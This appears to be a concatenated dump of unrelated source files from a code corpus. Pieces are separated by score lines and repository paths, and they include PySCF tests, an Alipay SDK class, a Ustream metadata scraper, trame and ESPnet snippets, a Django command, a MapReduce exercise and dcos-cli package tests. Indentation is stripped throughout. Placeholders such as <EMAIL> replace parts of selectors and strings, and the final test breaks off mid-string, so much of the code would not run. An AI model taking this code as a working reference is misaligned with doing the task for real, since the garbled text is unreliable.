self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit(), out=scf.GHF(mol), remove_df=False), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit(), out=scf.RHF(mol), remove_df=False),df_jk. _DFHF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit(), out=scf.UHF(mol), remove_df=False),df_jk. _DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit(), out=scf.GHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit(), out=scf.RHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit(), out=scf.UHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit(), out=scf.GHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit(), out=scf.RHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit(), out=scf.UHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit(), out=scf.GHF(mol), remove_df=True), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit(), out=scf.RHF(mol), remove_df=True),df_jk. _DFHF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit(), out=scf.UHF(mol), remove_df=True),df_jk. _DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit(), out=scf.GHF(mol), remove_df=True), df_jk._DFHF))
addons.convert_to_rhf(scf.RHF(mol).x2c().density_fit())
addons.convert_to_uhf(scf.RHF(mol).x2c().density_fit())
addons.convert_to_ghf(scf.RHF(mol).x2c().density_fit())
addons.convert_to_rhf(scf.UHF(mol).x2c().density_fit())
addons.convert_to_uhf(scf.UHF(mol).x2c().density_fit())
addons.convert_to_ghf(scf.UHF(mol).x2c().density_fit())
#addons.convert_to_rhf(scf.GHF(mol).x2c().density_fit())
#addons.convert_to_uhf(scf.GHF(mol).x2c().density_fit())
addons.convert_to_ghf(scf.GHF(mol).x2c().density_fit())
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).newton().density_fit()), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).newton().density_fit()), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit().newton()), df_jk._DFHF))
#self.assertTrue(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit().newton()), df_jk._DFHF))
#self.assertTrue(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit().newton()), df_jk._DFHF))
def test_get_ghf_orbspin(self):
orbspin = addons.get_ghf_orbspin(mf.mo_energy, mf.mo_occ)
self.assertEqual(list(orbspin), [0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1])
orbspin = addons.get_ghf_orbspin(mf_u.mo_energy, mf_u.mo_occ, is_rhf=False)
self.assertEqual(list(orbspin), [0,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,1])
def test_remove_lindep(self):
mol = gto.M(verbose = 0,
atom = [('H', 0, 0, i*.5) for i in range(4)],
basis = ('sto-3g',[[0, [.002,1]]]))
mf = addons.remove_linear_dep_(scf.RHF(mol), threshold=1e-8,
lindep=1e-9).run()
self.assertAlmostEqual(mf.e_tot, -1.6291001503057689, 7)
if __name__ == "__main__":
print("Full Tests for addons")
unittest.main()
| 1.757813
| 2
|
alipay/aop/api/domain/MiniAppFirstCategoryInfo.py
|
articuly/alipay-sdk-python-all
| 0
|
12783857
|
<reponame>articuly/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MiniAppSecondCategoryInfo import MiniAppSecondCategoryInfo
class MiniAppFirstCategoryInfo(object):
def __init__(self):
self._category_id = None
self._category_name = None
self._child_category = None
@property
def category_id(self):
return self._category_id
@category_id.setter
def category_id(self, value):
self._category_id = value
@property
def category_name(self):
return self._category_name
@category_name.setter
def category_name(self, value):
self._category_name = value
@property
def child_category(self):
return self._child_category
@child_category.setter
def child_category(self, value):
if isinstance(value, list):
self._child_category = list()
for i in value:
if isinstance(i, MiniAppSecondCategoryInfo):
self._child_category.append(i)
else:
self._child_category.append(MiniAppSecondCategoryInfo.from_alipay_dict(i))
def to_alipay_dict(self):
params = dict()
if self.category_id:
if hasattr(self.category_id, 'to_alipay_dict'):
params['category_id'] = self.category_id.to_alipay_dict()
else:
params['category_id'] = self.category_id
if self.category_name:
if hasattr(self.category_name, 'to_alipay_dict'):
params['category_name'] = self.category_name.to_alipay_dict()
else:
params['category_name'] = self.category_name
if self.child_category:
if isinstance(self.child_category, list):
for i in range(0, len(self.child_category)):
element = self.child_category[i]
if hasattr(element, 'to_alipay_dict'):
self.child_category[i] = element.to_alipay_dict()
if hasattr(self.child_category, 'to_alipay_dict'):
params['child_category'] = self.child_category.to_alipay_dict()
else:
params['child_category'] = self.child_category
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MiniAppFirstCategoryInfo()
if 'category_id' in d:
o.category_id = d['category_id']
if 'category_name' in d:
o.category_name = d['category_name']
if 'child_category' in d:
o.child_category = d['child_category']
return o
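# --- Hedged usage sketch (not part of the SDK file) ---
# Round-tripping a plain dict through from_alipay_dict/to_alipay_dict; the
# category values are made up, and the companion MiniAppSecondCategoryInfo
# class is assumed to follow the same from/to_alipay_dict pattern.
if __name__ == "__main__":
    raw = {
        "category_id": "1001",
        "category_name": "Tools",
        "child_category": [{"category_id": "2001", "category_name": "Utilities"}],
    }
    info = MiniAppFirstCategoryInfo.from_alipay_dict(raw)
    print(info.to_alipay_dict())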
| 1.992188
| 2
|
bin/get_from_ustream.py
|
cleiver/codeandtalk.com
| 60
|
12783858
|
#!/usr/bin/env python3
import argparse
import json
import os
from pyquery import PyQuery
import re
import requests
# given a URL such as http://www.ustream.tv/recorded/102894434
# fetch the details of the presentation
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='URL of the video: http://www.ustream.tv/recorded/102894434', required=True)
parser.add_argument('-d', '--date', help='date in YYYY-MM-DD format', required=True)
parser.add_argument('-e', '--event', help='event name, used as the data/videos/<event> directory', required=True)
args = parser.parse_args()
#print(args.url)
#print(args.date)
#print(args.event)
response = requests.get(args.url)
if response.status_code != 200:
print("Failed to fetch {}".format(args.url))
return
m = re.search(r'\d+$', args.url)
video_code = m.group(0)
#print(video_code)
event_dir = 'data/videos/{}'.format(args.event)
#print(event_dir)
if not os.path.exists(event_dir):
os.mkdir(event_dir)
html = PyQuery(response.content)
# speaker - title
# <meta property="og:title" content="<NAME> - Tech Lead Skills for Developers" />
speaker_title = html('meta[@property="og:title"]')[0].attrib['content']
speaker, title = speaker_title.split(' - ', 1)
# print(speaker)
# print(title)
#re.sub(r'', '-', title.lower())
speaker_nickname = re.sub(r' +', '-', speaker.lower())
print(speaker_nickname)
speaker_file = "data/people/{}.txt".format(speaker_nickname)
if not os.path.exists(speaker_file):
with open(speaker_file, 'w') as fh:
fh.write("name: {}\n".format(speaker))
event_file = "{}/{}.json".format(event_dir, video_code)
print(event_file)
data = {
"description" : html('meta[<EMAIL>"]')[0].attrib['content'],
"favorite": "0",
"length": "",
"likes": "0",
"recorded": args.date,
"speakers": [
speaker_nickname
],
"tags": [],
# <meta property="og:image" content="http://static-cdn1.ustream.tv/i/video/picture/0/1/102/102894/102894434/1_17590738_102894434,640x360,b,1:2.jpg" />
"thumbnail_url": html('meta[<EMAIL>="og:<EMAIL>"]')[0].attrib['content'],
"title": title,
"videos": [
{
"code": video_code,
"type": "ustream"
}
],
"views": "0"
}
#import code
#video_code.interact(local=locals())
#m = html('meta["property="og:description"]')
#print(m.html)
if os.path.exists(event_file):
print("File {} already exists.".format(event_file))
return
with open(event_file, 'w') as fh:
json.dump(data, fh, sort_keys=True, indent=4, separators=(',', ': '))
print("length is missing! Add it manually!")
main()
# vim: expandtab
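# Hedged invocation example (date and event values are placeholders); the three
# required flags defined above are --url, --date and --event:
#   python bin/get_from_ustream.py \
#       --url http://www.ustream.tv/recorded/102894434 \
#       --date 2017-05-01 --event some-conference-2017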
| 3.03125
| 3
|
examples/validation/core/04_update_template.py
|
Kitware/trame
| 42
|
12783859
|
<gh_stars>10-100
from trame.app import get_server
from trame.widgets import html, trame
from trame.ui.html import DivLayout
LINE_COUNT = 1
# -----------------------------------------------------------------------------
# Trame setup
# -----------------------------------------------------------------------------
server = get_server()
layout = DivLayout(server)
def add_new_line():
global LINE_COUNT
with layout as c:
c.root.add_child(f"<br>New line {LINE_COUNT}")
LINE_COUNT += 1
with layout:
html.Button("Add a new line ({{ tts }})", click=add_new_line)
trame.LifeCycleMonitor(type="error", events=("['created']",))
# -----------------------------------------------------------------------------
# start server
# -----------------------------------------------------------------------------
if __name__ == "__main__":
server.start()
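# Hedged usage note: running this file starts the trame server; depending on
# the installed trame version, the listening port can usually be selected with
# the standard `--port` command-line flag, e.g.
#   python 04_update_template.py --port 8080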
| 2.671875
| 3
|
egs/vwm/tts1/loadXvector.py
|
mapledxf/espnet
| 0
|
12783860
|
#!/usr/bin/env python
# coding=utf-8
import kaldiio
import torch

x = kaldiio.load_mat("/home/zlj/dxf/espnet/egs/vwm/tts1/decode/tts/xvectors/xvector.1.ark:4")
# `device` is not defined elsewhere in this snippet; CPU/CUDA selection below is an assumption.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
spemb = torch.FloatTensor(x).to(device)
print(str(x))
| 2.421875
| 2
|
core/src/main/python/wlsdeploy/aliases/__init__.py
|
CarolynRountree/weblogic-deploy-tooling
| 0
|
12783861
|
"""
Copyright (c) 2017, 2018, Oracle and/or its affiliates. All rights reserved.
The Universal Permissive License (UPL), Version 1.0
This package provides the WLST knowledge base used by the rest of the code to understand how to perform
its work across WebLogic versions and WLST modes.
"""
| 0.800781
| 1
|
armulator/armv6/memory_types.py
|
matan1008/armulator
| 16
|
12783862
|
from abc import ABCMeta, abstractmethod
class MemoryType(object):
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, size):
self.size = size
def __getitem__(self, (address, size)):
return self.read(address, size)
def __setitem__(self, address_size, value):
self.write(address_size[0], address_size[1], value)
@abstractmethod
def read(self, address, size):
pass
@abstractmethod
def write(self, address, size, value):
pass
class RAM(MemoryType):
def __init__(self, size):
super(RAM, self).__init__(size)
self.memory_array = bytearray(size)
def read(self, address, size):
chunk = self.memory_array[address:address + size]
return chunk
def write(self, address, size, value):
self.memory_array[address:address + size] = value
MEMORY_TYPE_DICT = {
"RAM": RAM
}
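# --- Hedged usage sketch (Python 2, matching the tuple-argument __getitem__ above) ---
# The address and payload below are illustrative only.
if __name__ == "__main__":
    ram = MEMORY_TYPE_DICT["RAM"](0x100)
    ram[0x10, 4] = b"\x01\x02\x03\x04"   # write 4 bytes at address 0x10
    print(repr(ram[0x10, 4]))            # read them back as a bytearray slice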
| 3.59375
| 4
|
combiner/management/commands/fixtures.py
|
storrellas/idrink
| 0
|
12783863
|
<filename>combiner/management/commands/fixtures.py
from django.core.management.base import BaseCommand, CommandError
from combiner.models import Ingredient, Drink
class Command(BaseCommand):
help = 'Creates example Ingredient/Drink fixture entities for the combiner app'
# def add_arguments(self, parser):
# parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
# Generate entities
try:
# Ingredient/Drink are the models imported above; ingredient_list is assumed
# to be a many-to-many field on Drink.
beefeater = Ingredient.objects.create(name='beefeater', description='this is description for beefeater')
dry_vermouth = Ingredient.objects.create(name='dry_vermouth', description='this is description for dry_vermouth')
orange = Ingredient.objects.create(name='orange', description='this is description for orange')
drink = Drink.objects.create(name="martini", description="this is a cool drink used among modernets")
drink.ingredient_list.set([beefeater, dry_vermouth, orange])
except:
raise CommandError('Failed to create entities')
self.stdout.write(self.style.SUCCESS('Successfully created entities for drink'))
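# Hedged usage note: as a Django management command living in
# combiner/management/commands/fixtures.py, this is invoked as
#   python manage.py fixtures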
| 2.328125
| 2
|
week_3/mapReduce_tasks/problem4.py
|
FireAndBlood12/db-coursera
| 0
|
12783864
|
import MapReduce
import sys
"""
Word Count Example in the Simple Python MapReduce Framework
"""
mr = MapReduce.MapReduce()
# =============================
# Do not modify above this line
def mapper(record):
# record: [person, friend] -- one directed friendship
key = record[0]
friend = record[1]
#emit main relationship
mr.emit_intermediate(key, record);
#emit friend relationship to check non-sym
mr.emit_intermediate(friend, record);
def reducer(key, list_of_values):
# key: person
# list_of_values: every friendship record that mentions this person
for v in list_of_values:
nonRel=[v[1],v[0]]
if nonRel not in list_of_values:
if v[0] == key:
mr.emit((v[0],v[1]))
else:
mr.emit((v[1],v[0]))
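# Hedged worked example (input values are made up): for the records
#   ["A","B"], ["B","A"], ["A","C"]
# the mapper emits each record under both people; in the reducer only
# ["A","C"] lacks its reverse ["C","A"], so the asymmetric pair is emitted
# under both keys as ("A","C") and ("C","A").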
# Do not modify below this line
# =============================
if __name__ == '__main__':
inputdata = open(sys.argv[1])
mr.execute(inputdata, mapper, reducer)
| 3.703125
| 4
|
cli/tests/integrations/test_package.py
|
ConnectionMaster/dcos-cli
| 1
|
12783865
|
<reponame>ConnectionMaster/dcos-cli
import contextlib
import json
import os
import pkg_resources
import six
from dcos import package, subcommand
from dcos.errors import DCOSException
import pytest
from mock import patch
from .common import (assert_command, assert_lines, delete_zk_nodes,
exec_command, file_bytes, file_json, get_services,
service_shutdown, wait_for_service, watch_all_deployments)
@pytest.fixture(scope="module")
def zk_znode(request):
request.addfinalizer(delete_zk_nodes)
return request
def _chronos_description(app_ids):
"""
:param app_ids: a list of application id
:type app_ids: [str]
:returns: a binary string representing the chronos description
:rtype: str
"""
result = [
{"apps": app_ids,
"description": "A fault tolerant job scheduler for Mesos which "
"handles dependencies and ISO8601 based schedules.",
"framework": True,
"images": {
"icon-large": "https://downloads.mesosphere.io/chronos/assets/"
"icon-service-chronos-large.png",
"icon-medium": "https://downloads.mesosphere.io/chronos/assets/"
"icon-service-chronos-medium.png",
"icon-small": "https://downloads.mesosphere.io/chronos/assets/"
"icon-service-chronos-small.png"
},
"licenses": [
{
"name": "Apache License Version 2.0",
"url": "https://github.com/mesos/chronos/blob/master/LICENSE"
}
],
"maintainer": "<EMAIL>",
"name": "chronos",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "Chronos DCOS Service has been successfully "
"installed!\n\n\tDocumentation: http://mesos."
"github.io/chronos\n\tIssues: https://github.com/"
"mesos/chronos/issues",
"postUninstallNotes": "The Chronos DCOS Service has been uninstalled "
"and will no longer run.\nPlease follow the "
"instructions at http://docs.mesosphere."
"com/services/chronos/#uninstall to clean up "
"any persisted state",
"preInstallNotes": "We recommend a minimum of one node with at least "
"1 CPU and 2GB of RAM available for the Chronos "
"Service.",
"releaseVersion": "1",
"scm": "https://github.com/mesos/chronos.git",
"tags": [
"cron",
"analytics",
"batch"
],
"version": "2.4.0"
}]
return (json.dumps(result, sort_keys=True, indent=2).replace(' \n', '\n') +
'\n').encode('utf-8')
def test_package():
stdout = pkg_resources.resource_string(
'tests',
'data/help/package.txt')
assert_command(['dcos', 'package', '--help'],
stdout=stdout)
def test_info():
assert_command(['dcos', 'package', '--info'],
stdout=b'Install and manage DCOS packages\n')
def test_version():
assert_command(['dcos', 'package', '--version'],
stdout=b'dcos-package version SNAPSHOT\n')
def test_sources_list():
stdout = b"fd40db7f075490e0c92ec6fcd62ec1caa361b313 " + \
b"https://github.com/mesosphere/universe/archive/cli-test-3.zip\n"
assert_command(['dcos', 'package', 'sources'],
stdout=stdout)
def test_update_without_validation():
returncode, stdout, stderr = exec_command(['dcos', 'package', 'update'])
assert returncode == 0
assert b'source' in stdout
assert b'Validating package definitions...' not in stdout
assert b'OK' not in stdout
assert stderr == b''
def test_update_with_validation():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'update', '--validate'])
assert returncode == 0
assert b'source' in stdout
assert b'Validating package definitions...' in stdout
assert b'OK' in stdout
assert stderr == b''
def test_describe_nonexistent():
assert_command(['dcos', 'package', 'describe', 'xyzzy'],
stderr=b'Package [xyzzy] not found\n',
returncode=1)
def test_describe_nonexistent_version():
stderr = b'Version a.b.c of package [marathon] is not available\n'
assert_command(['dcos', 'package', 'describe', 'marathon',
'--package-version=a.b.c'],
stderr=stderr,
returncode=1)
def test_describe():
stdout = file_json(
'tests/data/package/json/test_describe_marathon.json')
assert_command(['dcos', 'package', 'describe', 'marathon'],
stdout=stdout)
def test_describe_cli():
stdout = file_json(
'tests/data/package/json/test_describe_cli_cassandra.json')
assert_command(['dcos', 'package', 'describe', 'cassandra', '--cli'],
stdout=stdout)
def test_describe_app():
stdout = file_bytes(
'tests/data/package/json/test_describe_app_marathon.json')
assert_command(['dcos', 'package', 'describe', 'marathon', '--app'],
stdout=stdout)
def test_describe_config():
stdout = file_json(
'tests/data/package/json/test_describe_marathon_config.json')
assert_command(['dcos', 'package', 'describe', 'marathon', '--config'],
stdout=stdout)
def test_describe_render():
stdout = file_json(
'tests/data/package/json/test_describe_marathon_app_render.json')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--app', '--render'],
stdout=stdout)
def test_describe_package_version():
stdout = file_json(
'tests/data/package/json/test_describe_marathon_package_version.json')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-version=0.8.1'],
stdout=stdout)
def test_describe_package_version_missing():
stderr = b'Version bogus of package [marathon] is not available\n'
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-version=bogus'],
returncode=1,
stderr=stderr)
def test_describe_package_versions():
stdout = file_bytes(
'tests/data/package/json/test_describe_marathon_package_versions.json')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-versions'],
stdout=stdout)
def test_describe_package_versions_others():
stderr = (b'If --package-versions is provided, no other option can be '
b'provided\n')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-versions',
'--app'],
returncode=1,
stderr=stderr)
def test_describe_options():
stdout = file_json(
'tests/data/package/json/test_describe_app_options.json')
assert_command(['dcos', 'package', 'describe', '--app', '--options',
'tests/data/package/marathon.json', 'marathon'],
stdout=stdout)
def test_describe_app_cli():
stdout = file_bytes(
'tests/data/package/json/test_describe_app_cli.json')
assert_command(
['dcos', 'package', 'describe', 'cassandra', '--app', '--cli'],
stdout=stdout)
def test_describe_specific_version():
stdout = file_bytes(
'tests/data/package/json/test_describe_marathon_0.8.1.json')
assert_command(['dcos', 'package', 'describe', '--package-version=0.8.1',
'marathon'],
stdout=stdout)
def test_bad_install():
args = ['--options=tests/data/package/chronos-bad.json', '--yes']
stderr = b"""Error: False is not of type 'string'
Path: chronos.zk-hosts
Value: false
Please create a JSON file with the appropriate options, and pass the \
/path/to/file as an --options argument.
"""
_install_chronos(args=args,
returncode=1,
stdout=b'',
stderr=stderr,
postInstallNotes=b'')
def test_install(zk_znode):
_install_chronos()
watch_all_deployments()
wait_for_service('chronos')
_uninstall_chronos()
watch_all_deployments()
services = get_services(args=['--inactive'])
assert len([service for service in services
if service['name'] == 'chronos']) == 0
def test_install_missing_options_file():
"""Test that a missing options file results in the expected stderr
message."""
assert_command(
['dcos', 'package', 'install', 'chronos', '--yes',
'--options=asdf.json'],
returncode=1,
stderr=b"Error opening file [asdf.json]: No such file or directory\n")
def test_install_specific_version():
stdout = (b'We recommend a minimum of one node with at least 2 '
b'CPU\'s and 1GB of RAM available for the Marathon Service.\n'
b'Installing Marathon app for package [marathon] '
b'version [0.8.1]\n'
b'Marathon DCOS Service has been successfully installed!\n\n'
b'\tDocumentation: https://mesosphere.github.io/marathon\n'
b'\tIssues: https:/github.com/mesosphere/marathon/issues\n\n')
uninstall_stderr = (
b'Uninstalled package [marathon] version [0.8.1]\n'
b'The Marathon DCOS Service has been uninstalled and will no longer '
b'run.\nPlease follow the instructions at http://docs.mesosphere.com/'
b'services/marathon/#uninstall to clean up any persisted state\n'
)
with _package('marathon',
stdout=stdout,
uninstall_stderr=uninstall_stderr,
args=['--yes', '--package-version=0.8.1']):
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'list', 'marathon', '--json'])
assert returncode == 0
assert stderr == b''
assert json.loads(stdout.decode('utf-8'))[0]['version'] == "0.8.1"
def test_install_bad_package_version():
stderr = b'Version a.b.c of package [cassandra] is not available\n'
assert_command(
['dcos', 'package', 'install', 'cassandra',
'--package-version=a.b.c'],
returncode=1,
stderr=stderr)
def test_package_metadata():
_install_helloworld()
# test marathon labels
expected_metadata = b"""<KEY>=="""
expected_command = b"""<KEY>""
expected_source = b"""https://github.com/mesosphere/universe/archive/\
cli-test-3.zip"""
expected_labels = {
'DCOS_PACKAGE_METADATA': expected_metadata,
'DCOS_PACKAGE_COMMAND': expected_command,
'DCOS_PACKAGE_REGISTRY_VERSION': b'2.0.0-rc1',
'DCOS_PACKAGE_NAME': b'helloworld',
'DCOS_PACKAGE_VERSION': b'0.1.0',
'DCOS_PACKAGE_SOURCE': expected_source,
'DCOS_PACKAGE_RELEASE': b'0',
}
app_labels = _get_app_labels('helloworld')
for label, value in expected_labels.items():
assert value == six.b(app_labels.get(label))
# test local package.json
package = {
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"tags": ["mesosphere", "example", "subcommand"],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld",
}
package_dir = subcommand.package_dir('helloworld')
# test local package.json
package_path = os.path.join(package_dir, 'package.json')
with open(package_path) as f:
assert json.load(f) == package
# test local source
source_path = os.path.join(package_dir, 'source')
with open(source_path) as f:
assert six.b(f.read()) == expected_source
# test local version
version_path = os.path.join(package_dir, 'version')
with open(version_path) as f:
assert six.b(f.read()) == b'0'
# uninstall helloworld
_uninstall_helloworld()
def test_install_with_id(zk_znode):
args = ['--app-id=chronos-1', '--yes']
stdout = (b'Installing Marathon app for package [chronos] version [2.4.0] '
b'with app id [chronos-1]\n')
_install_chronos(args=args, stdout=stdout)
args = ['--app-id=chronos-2', '--yes']
stdout = (b'Installing Marathon app for package [chronos] version [2.4.0] '
b'with app id [chronos-2]\n')
_install_chronos(args=args, stdout=stdout)
def test_install_missing_package():
stderr = b"""Package [missing-package] not found
You may need to run 'dcos package update' to update your repositories
"""
assert_command(['dcos', 'package', 'install', 'missing-package'],
returncode=1,
stderr=stderr)
def test_uninstall_with_id(zk_znode):
_uninstall_chronos(args=['--app-id=chronos-1'])
def test_uninstall_all(zk_znode):
_uninstall_chronos(args=['--all'])
get_services(expected_count=1, args=['--inactive'])
def test_uninstall_missing():
stderr = 'Package [chronos] is not installed.\n'
_uninstall_chronos(returncode=1, stderr=stderr)
stderr = 'Package [chronos] with id [chronos-1] is not installed.\n'
_uninstall_chronos(
args=['--app-id=chronos-1'],
returncode=1,
stderr=stderr)
def test_uninstall_subcommand():
_install_helloworld()
_uninstall_helloworld()
_list()
def test_uninstall_cli():
_install_helloworld()
_uninstall_helloworld(args=['--cli'])
stdout = b"""[
{
"apps": [
"/helloworld"
],
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"releaseVersion": "0",
"tags": [
"mesosphere",
"example",
"subcommand"
],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld"
}
]
"""
_list(stdout=stdout)
_uninstall_helloworld()
def test_uninstall_multiple_apps():
stdout = (b'A sample pre-installation message\n'
b'Installing Marathon app for package [helloworld] version '
b'[0.1.0] with app id [/helloworld-1]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n')
_install_helloworld(['--yes', '--app-id=/helloworld-1'],
stdout=stdout)
stdout = (b'A sample pre-installation message\n'
b'Installing Marathon app for package [helloworld] version '
b'[0.1.0] with app id [/helloworld-2]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n')
_install_helloworld(['--yes', '--app-id=/helloworld-2'],
stdout=stdout)
stderr = (b"Multiple apps named [helloworld] are installed: "
b"[/helloworld-1, /helloworld-2].\n"
b"Please use --app-id to specify the ID of the app "
b"to uninstall, or use --all to uninstall all apps.\n")
_uninstall_helloworld(stderr=stderr,
returncode=1)
assert_command(['dcos', 'package', 'uninstall', 'helloworld', '--all'])
watch_all_deployments()
def test_list(zk_znode):
_list()
_list(args=['xyzzy', '--json'])
_list(args=['--app-id=/xyzzy', '--json'])
_install_chronos()
expected_output = _chronos_description(['/chronos'])
_list(stdout=expected_output)
_list(args=['--json', 'chronos'],
stdout=expected_output)
_list(args=['--json', '--app-id=/chronos'],
stdout=expected_output)
_list(args=['--json', 'ceci-nest-pas-une-package'])
_list(args=['--json', '--app-id=/ceci-nest-pas-une-package'])
_uninstall_chronos()
def test_list_table():
with _helloworld():
assert_lines(['dcos', 'package', 'list'], 2)
def test_install_yes():
with open('tests/data/package/assume_yes.txt') as yes_file:
_install_helloworld(
args=[],
stdin=yes_file,
stdout=b'A sample pre-installation message\n'
b'Continue installing? [yes/no] '
b'Installing Marathon app for package [helloworld] version '
b'[0.1.0]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n')
_uninstall_helloworld()
def test_install_no():
with open('tests/data/package/assume_no.txt') as no_file:
_install_helloworld(
args=[],
stdin=no_file,
stdout=b'A sample pre-installation message\n'
b'Continue installing? [yes/no] Exiting installation.\n')
def test_list_cli():
_install_helloworld()
stdout = b"""\
[
{
"apps": [
"/helloworld"
],
"command": {
"name": "helloworld"
},
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"releaseVersion": "0",
"tags": [
"mesosphere",
"example",
"subcommand"
],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld"
}
]
"""
_list(stdout=stdout)
_uninstall_helloworld()
stdout = (b"A sample pre-installation message\n"
b"Installing CLI subcommand for package [helloworld] " +
b"version [0.1.0]\n"
b"New command available: dcos helloworld\n"
b"A sample post-installation message\n")
_install_helloworld(args=['--cli', '--yes'], stdout=stdout)
stdout = b"""\
[
{
"command": {
"name": "helloworld"
},
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"packageSource": "https://github.com/mesosphere/universe/archive/\
